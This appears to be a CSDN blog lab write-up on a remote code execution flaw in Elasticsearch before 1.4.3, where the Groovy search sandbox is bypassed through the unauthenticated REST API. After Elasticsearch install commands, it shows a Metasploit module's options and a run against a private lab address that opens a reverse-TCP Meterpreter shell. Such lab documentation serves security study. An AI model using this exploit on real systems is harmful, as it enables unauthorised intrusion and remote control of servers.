Lab - ElasticSearch Search Groovy Sandbox Bypass

最新推荐文章于 2024-09-11 07:33:53 发布

Nixawk

最新推荐文章于 2024-09-11 07:33:53 发布

阅读量2.1k

点赞数

CC 4.0 BY-SA版权

分类专栏： Pentesting Vulnerability Analysis

本文链接：https://blog.youkuaiyun.com/nixawk/article/details/50807166

Pentesting 同时被 2 个专栏收录

160 篇文章

订阅专栏

Vulnerability Analysis

76 篇文章

订阅专栏

本文介绍了Elasticsearch 1.4.2版本中存在的一处远程命令执行漏洞及其利用方式。该漏洞允许攻击者通过REST API执行Groovy代码，进而实现对目标系统的控制。文章还提供了漏洞利用的具体步骤及测试环境。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0

Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.

Install

Please read the page.

elasticsearch can be started using:

$ bin/elasticsearch

On *nix systems, the command will start the process in the foreground.

Running as a daemon

To run it in the background, add the -d switch to it:

$ bin/elasticsearch -d

PID

The Elasticsearch process can write its PID to a specified file on startup, making it easy to shut down the process later on:

$ bin/elasticsearch -d -p pid 
$ kill `cat pid`

Exploit

This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.

msf exploit(search_groovy_script) > show options 

Module options (exploit/multi/elasticsearch/search_groovy_script):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.102    yes       The target address
   RPORT      9200             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the ElasticSearch REST API
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   ElasticSearch 1.4.2


msf exploit(search_groovy_script) > run 

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (46112 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.102:59238) at 2016-03-05 08:25:25 +0800
[+] Deleted /tmp/rCrwvV.jar

meterpreter > sysinfo 
Computer    : lab
OS          : Linux 4.3.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >